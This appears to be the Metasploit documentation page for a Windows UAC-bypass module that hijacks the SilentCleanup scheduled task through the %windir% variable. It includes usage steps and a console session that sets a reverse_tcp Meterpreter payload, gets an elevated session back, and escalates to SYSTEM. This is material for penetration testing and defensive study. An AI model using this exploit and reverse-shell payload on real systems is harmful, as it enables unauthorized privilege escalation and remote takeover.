h00die
78 lines
3.3 KiB
Markdown
78 lines
3.3 KiB
Markdown
## Introduction
|
|
|
|
This module will bypass UAC on any Windows installation with Powershell installed.
|
|
|
|
There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
|
|
When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
|
|
%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
|
|
be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.
|
|
|
|
## Usage
|
|
|
|
1. Create a session on the target system under the context of a local administrative user.
|
|
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_silentcleanup`.
|
|
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
|
|
1. If an existing handler is configured to receive the elevated session, then the module's
|
|
handler should be disabled: `set DisablePayloadHandler true`.
|
|
1. Make sure that the `SESSION` value is set to the existing session identifier.
|
|
1. Invoke the module: `run`.
|
|
|
|
## Scenarios
|
|
|
|
```
|
|
msf5 > sessions
|
|
|
|
Active sessions
|
|
===============
|
|
|
|
Id Name Type Information Connection
|
|
-- ---- ---- ----------- ----------
|
|
6 meterpreter x86/windows DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP 192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)
|
|
|
|
msf5 > use exploit/windows/local/bypassuac_silentcleanup
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
|
|
SESSION => 6
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
|
|
LHOST => 192.168.1.xx
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) > options
|
|
|
|
Module options (exploit/windows/local/bypassuac_silentcleanup):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
SESSION 6 yes The session to run this module on.
|
|
SLEEPTIME 0 no The time (ms) to sleep before running SilentCleanup
|
|
|
|
|
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
|
LHOST 192.168.1.55 yes The listen address (an interface may be specified)
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
Exploit target:
|
|
|
|
Id Name
|
|
-- ----
|
|
0 Microsoft Windows
|
|
|
|
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) > run
|
|
|
|
[*] Started reverse TCP handler on 192.168.1.xx:4444
|
|
[+] Part of Administrators group! Continuing...
|
|
[*] Sending stage (206403 bytes) to 192.168.1.x
|
|
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400
|
|
|
|
meterpreter > getsystem
|
|
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
|
meterpreter > bg
|
|
[*] Backgrounding session 10...
|
|
msf5 exploit(windows/local/bypassuac_silentcleanup) >
|
|
```
|